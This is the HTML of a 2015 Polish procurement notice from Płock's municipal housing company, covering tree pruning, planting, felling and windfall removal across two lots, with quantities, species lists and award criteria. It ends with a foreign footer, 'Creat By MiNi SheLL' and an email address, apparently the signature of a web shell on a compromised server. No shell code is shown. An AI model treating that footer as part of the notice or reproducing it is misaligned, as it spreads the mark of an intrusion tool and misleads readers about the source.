<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania w umowie następujących zmian Cz. I:
1) przedmiotu umowy - na warunkach określonych w § 3 umowy tj .
1.	Zamawiający zastrzega sobie prawo do zmian  zakresu ilościowego i rzeczowego drzew krzewów  oraz  wprowadzenia zamiennych gatunków drzew i krzewów, z uwagi na możliwość wystąpienia nieprzewidzianych zdarzeń i okoliczności oraz zmiennych warunków atmosferycznych.
2.	Zamawiający zastrzega sobie prawo do zmian  zakresu ilościowego i rzeczowego drzew i krzewów oraz  wprowadzenia zamiennych gatunków drzew i krzewów, z powodu ograniczenia lub zmiany powierzchni administrowanych terenów.
3.	Zamawiający zastrzega sobie prawo do zmian  zakresu ilościowego i rzeczowego cięcia formującego rabat oraz cięcia formującego krzewów, z powodu ograniczenia lub zmiany powierzchni administrowanych terenów.
4.	Zamawiający pisemnie zawiadomi Wykonawcę  z 3 - dniowym wyprzedzeniem o zmianach wskazanych w § 3 pkt 1,2,3.
2) wynagrodzenia w przypadku:
a) ustawowej zmiany wysokości podatki VAT - na warunkach określonych w § 19 ust. 1 umowy.
3) terminu realizacji przedmiotu umowy ze względu na:
a) zaistnienie działań wojennych, aktów terroryzmu, rewolucji, przewrotu wojskowego lub cywilnego, wojny domowej, skażeń radioaktywnych, z wyjątkiem tych, które mogą być spowodowane użyciem ich przez wykonawcę,
b) zaistnienie klęski żywiołowej, jak huragany, powodzie, trzęsienie ziemi, bunty, niepokoje, strajki.
- na warunkach określonych w § 19 ust. 1 umowy.
Zamawiający dopuszcza możliwość dokonania w umowie następujących zmian Cz. II:
1) przedmiotu umowy - na warunkach określonych w § 3 umowy tj.
1.	Zamawiający zastrzega sobie prawo do zmian  zakresu ilościowego drzew z uwagi na możliwość wystąpienia nieprzewidzianych zdarzeń i okoliczności oraz zmiennych warunków atmosferycznych.
2.	Zamawiający zastrzega sobie prawo do zmian  zakresu ilościowego drzew z powodu ograniczenia lub zmiany powierzchni administrowanych terenów.
3.	Zamawiający zastrzega sobie prawo do zmian  zakresu ilościowego usunięcia połamanych palików oraz usuwania wiatrołomów z uwagi na możliwość wystąpienia nieprzewidzianych zdarzeń i okoliczności oraz zmiennych warunków atmosferycznych.
4.	Zamawiający zastrzega sobie prawo do zmian  zakresu ilościowego usunięcia połamanych palików oraz usuwania wiatrołomów z powodu ograniczenia lub zmiany powierzchni administrowanych terenów.
5.	Zamawiający pisemnie zawiadomi Wykonawcę  z 3 - dniowym wyprzedzeniem o zmianach wskazanych w § 3 pkt 1, 2,3,4.

2) wynagrodzenia w przypadku:
a) ustawowej zmiany wysokości podatki VAT - na warunkach określonych w § 18 ust. 1 umowy.
3) terminu realizacji przedmiotu umowy ze względu na:
a) zaistnienie działań wojennych, aktów terroryzmu, rewolucji, przewrotu wojskowego lub cywilnego, wojny domowej, skażeń radioaktywnych, z wyjątkiem tych, które mogą być spowodowane użyciem ich przez wykonawcę,
b) zaistnienie klęski żywiołowej, jak huragany, powodzie, trzęsienie ziemi, bunty, niepokoje, strajki.
- na warunkach określonych w § 18 ust. 1 umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzgm-plock.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zakład Gospodarki Mieszkaniowej - TBS Sp. z o.o. ul. Polna 7, 09-400 Płock p. nr 32 pn.pt w godz. 7:30 - 15:30 po uiszczeniu opłaty za jej wydanie w kwocie 23,98 zł brutto.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.11.2015 godzina 09:30, miejsce: Miejski Zakład Gospodarki Mieszkaniowej - TBS Sp. z o.o. ul. Polna 7, 09-400 Płock, Kancelaria p. nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CIĘCIA PIELĘGNACYJNE I CIĘCIA TECHNICZNE W KORONIE DRZEW, CIĘCIA FORMUJĄCE RABAT I KRZEWÓW ORAZ NASADZENIA DRZEW I KRZEWÓW..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> . Prace wykonywane będą na terenach stanowiących własność i współwłasność Gminy Miasto Płock lub będących w jej posiadaniu, administrowanych przez Miejski Zakład Gospodarki Mieszkaniowej    TBS Sp. z o. o. w Płocku - Rejon Obsługi Mieszkańców Nr III, IV , V. Termin realizacji zamówienia od dnia podpisania umowy do dnia  25.11.2015 r. ZAKRES ZADANIA  CZĘŚĆ I: CIĘCIA PIELĘGNACYJNE I CIĘCIA TECHNICZNE W KORONIE DRZEW, CIĘCIA FORMUJĄCE RABAT I KRZEWÓW ORAZ NASADZENIA DRZEW I KRZEWÓW. 1.Cięcia pielęgnacyjne (cięcia prześwietlające, sanitarne, korygujące, odmładzające i formujące) i cięcia techniczne (cięcia techniczne wzdłuż ciągów komunikacyjnych, w energetyce i telekomunikacji, w budownictwie) w koronie drzew. 2.Nasadzenia drzew w ramach rekompensaty za usunięte drzewa, na podstawie decyzji wydanych przez: Wydział Kształtowania Środowiska  Oddział Ochrony Środowiska oraz Biuro Miejskiego Konserwatora Zabytków Urzędu Miasta Płocka. UWAGA: KORONA DRZEW POWINNA BYĆ UFORMOWANA NA WYSOKOŚCI: 2,20 DO 2,50 M. 3. Dokonanie nasadzeń drzew - sposób rozliczania nasadzeń  wg katalogu KNR Nr 2 21  Tereny zieleni MGPiB 2005 r. Materiał do nasadzeń powinien odpowiadać normie: PN R 87023 Materiał szkółkarski. Ozdobne drzewa i krzewy liściaste oraz PN -R-65022 Materiał siewny. Nasiona roślin rolniczych. Zakres zabiegów pielęgnacyjnych w ujęciu ilościowym: 1.Cięcia pielęgnacyjne i techniczne w koronie drzew  do 140 szt. 2.Cięcia formujące rabat (skupisk roślinnych)  do 5 276,60 m2 3.Cięcia formujące krzewów 92,00 m2 4.Nasadzenia drzew  do 24 szt. 5.Nasadzenia krzewów 30 szt. 6.Uprzątnięcie, wywóz i utylizacja odpadów powstałych w wyniku wykonywania prac wymienionych                                              w punkcie 1,2 i 3. UWAGA: Wykonawca zobowiązany jest do przedstawienia dowodu przekazania odpadów do utylizacji lub oświadczenia o zagospodarowaniu odpadów we własnym zakresie. Wykonawca zobowiązany jest do przekazania Zamawiającemu zbiorczej pisemnej informacji o ilości i sposobie zagospodarowania odpadów powstałych w trakcie wykonywania prac w ramach umowy(CZĘŚĆ I) za cały okres trwania umowy   w terminie do 7 dni od zakończenia umowy lub na każde żądanie Zamawiającego. Roboty będące przedmiotem zamówienia będą wykonywane przez Wykonawcę każdorazowo wyłącznie na pisemne zlecenie wystawione przez upoważnionych przez Zamawiającego pracowników Rejonów Obsługi Mieszkańców w zakresie, miejscu i terminie określonym w tym zleceniu. Ilości i gatunki drzew zostaną każdorazowo określone przez Zamawiającego w zleceniu. Z uwagi na możliwość wystąpienia nieprzewidzianych zdarzeń i okoliczności oraz zmiennych warunków atmosferycznych, Zamawiający zastrzega sobie prawo do zmian zakresu ilościowego Części I zamówienia. Wykonawcy nie przysługuje prawo zgłoszenia roszczeń do Zamawiającego z tytułu zmniejszenia zakresu usług w stosunku do zakresu określonego w SIWZ i w umowie oraz nie uzyskania wartości usług określonej na podstawie złożonej oferty. Wykonawca udzieli minimum 1 roku gwarancji na przedmiotowe zadanie. Do wykonywania robót związanych z cięciem pielęgnacyjnym i cięciem technicznym w koronie drzew oraz nasadzeniem drzew i krzewów należy stosować sprzęt wymieniony w SPECYFIKACJI TECHNICZNEJ WYKONANIA I ODBIORU ROBÓT DZIAŁ   3: 3.1.Wymagania ogólne, 3.2. Sprzęt stosowany do pielęgnacji terenu. WYKAZ GATUNKÓW I ODMIAN DRZEW DO NASADZENIA WRAZ Z DANYMI TECHNICZNYMI: Nazwa gatunku odmiana; Ilość w szt. : Głóg pośredni (Paul s Scarlett)obwód pnia mierzony na wysokości 100 cm min.14) 16 cm szt.1, Klon pospolity  (Red Shine)obwód pnia mierzony na wysokości 100 cm min.14 cm szt.2, Klon polny (Red Shine) obwód pnia mierzony na wysokości 100 cm min.14 )16 cm szt.7, Grusza drobnolistna (Chanticleer) obwód pnia mierzony na wysokości 100 cm min.14 cm szt.4 , Wiśnia kanzan obwód pnia mierzony na wysokości 100 cm min.16 ) 18 cm szt.2, Brzoza Doorembos obwód pnia mierzony na wysokości 100 cm min. 14 ) 16 cm szt. 2 , Lipa drobnolistna (Greenspire) obwód pnia mierzony na wysokości 100 cm min.12 cm )16 cm szt. 6 Razem 24 szt. WYKAZ ODMIAN KRZEWÓW DO NASADZENIA. Nazwa odmiany, ilość w szt.: Tawuła japońska  goldmund szt. 5, Dereń sibirica szt. 10, Forsycja szt. 15 Razem 30 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.00.00.00-0, 77.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Gwarancja - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> WYCINKA DRZEW I FREZOWANIE KARP KORZENIOWYCH, USUNIĘCIE POŁAMANYCH PALIKÓW PRZY ROSNĄCYCH DRZEWKACH, USUWANIE WIATROŁOMÓW..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prace wykonywane będą na terenach stanowiących własność i współwłasność Gminy Miasto Płock lub będących w jej posiadaniu, administrowanych przez Miejski Zakład Gospodarki Mieszkaniowej    TBS Sp. z o. o. w Płocku - Rejon Obsługi Mieszkańców Nr III, IV , V. Termin realizacji zamówienia od dnia podpisania umowy do dnia  25.11.2015 r.
ZAKRES ZADANIA CZĘŚĆ II: WYCINKA DRZEW I FREZOWANIE KARP KORZENIOWYCH. USUNIĘCIE POŁAMANYCH PALIKÓW PRZY ROSNĄCYCH DRZEWKACH, USUWANIE WIATROŁOMÓW. 1.Wycinka drzew oraz frezowanie karp korzeniowych, usunięcie połamanych palików przy rosnących drzewkach, usuwanie wiatrołomów wg potrzeb zgłaszanych przez Rejony Obsługi Mieszkańców.2.Wycinka drzew na podstawie decyzji wydanych przez: Wydział Kształtowania Środowiska - Oddział Ochrony Środowiska oraz Biuro Miejskiego Konserwatora Zabytków Urzędu Miasta Płocka. 3.Wyrównanie terenu, a w razie konieczności uzupełnienie ubytków ziemią i jej ubicie wraz z uprzątnięciem, wywiezieniem i utylizacją odpadów powstałych w wyniku wykonywania prac wymienionych w punkcie 1.  Zakres zabiegów pielęgnacyjnych w ujęciu ilościowym: Wycinka drzew  ok. 41 sztuk, Frezowanie karp korzeniowych  ok. 41 sztuk  Usunięcie połamanych palików przy rosnących drzewkach w kpl. - do 193  (W jednym komplecie są trzy szt. palików)Usuwanie wiatrołomów (awarie)  do 13 szt.  wg przyjętych założeń, jak niżej: PRZYJĘTE ZAŁOŻENIA W ZAKRESIE USUWANIA WIATROŁOMÓW:           Wyszczególnienie przyjęte założenia: Grupa I  wiatrołomy o obwodzie pnia: do 50 cm  Przewidywane wiatrołomy: 3 szt. o obw. 50 cm, 1 szt. o obw. 40 cm razem 4 szt,, Grupa II wiatrołomy o obwodzie pnia:  51 cm do  100 cm Przewidywane wiatrołomy: 6 szt. o obw. 75 cm, 1 szt. o obw. 100 cm razem 7 szt., Grupa III  wiatrołomy o obwodzie pnia:  101 cm do 200 cm Przewidywane wiatrołomy: 2 szt. o obw. 190 cm razem 2 szt. Łącznie 13 szt. UWAGA: Wykonawca zobowiązany jest do przedstawienia dowodu przekazania odpadów do utylizacji lub oświadczenia o zagospodarowaniu odpadów we własnym zakresie. Wykonawca zobowiązany jest do przekazania Zamawiającemu zbiorczej pisemnej informacji o ilości i sposobie zagospodarowania odpadów powstałych w trakcie wykonywania prac w ramach umowy za cały okres trwania umowy (CZĘŚĆ II)  w terminie do 7 dni od zakończenia umowy lub na każde żądanie Zamawiającego Roboty będące przedmiotem zamówienia będą wykonywane przez Wykonawcę każdorazowo wyłącznie na pisemne zlecenie wystawione przez upoważnionych przez Zamawiającego pracowników Rejonów Obsługi Mieszkańców w zakresie, miejscu i terminie określonym w tym zleceniu. Ilości i gatunki drzew oraz ilości kpl. połamanych palików oraz wiatrołomów zostaną każdorazowo określone przez Zamawiającego w zleceniu.  Z uwagi na możliwość wystąpienia nieprzewidzianych zdarzeń i okoliczności oraz zmiennych warunków atmosferycznych, Zamawiający zastrzega sobie prawo do zmian zakresu ilościowego Części II zamówienia. Wykonawcy nie przysługuje prawo zgłoszenia roszczeń do Zamawiającego z tytułu zmniejszenia zakresu usług w stosunku do zakresu określonego w SIWZ i w umowie oraz nie uzyskania wartości usług określonej na podstawie złożonej oferty. Wykonawca udzieli minimum 1 roku gwarancji  na przedmiotowe zadanie. Do wykonywania robót związanych z usunięciem drzew  należy stosować sprzęt wymieniony w SPECYFIKACJI TECHNICZNEJ WYKONANIA I ODBIORU ROBÓT DZIAŁ 3: 3.1.Wymagania ogólne, 3.2. Sprzęt stosowany do pielęgnacji terenu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.00.00.00-0, 77.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Gwarancja - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com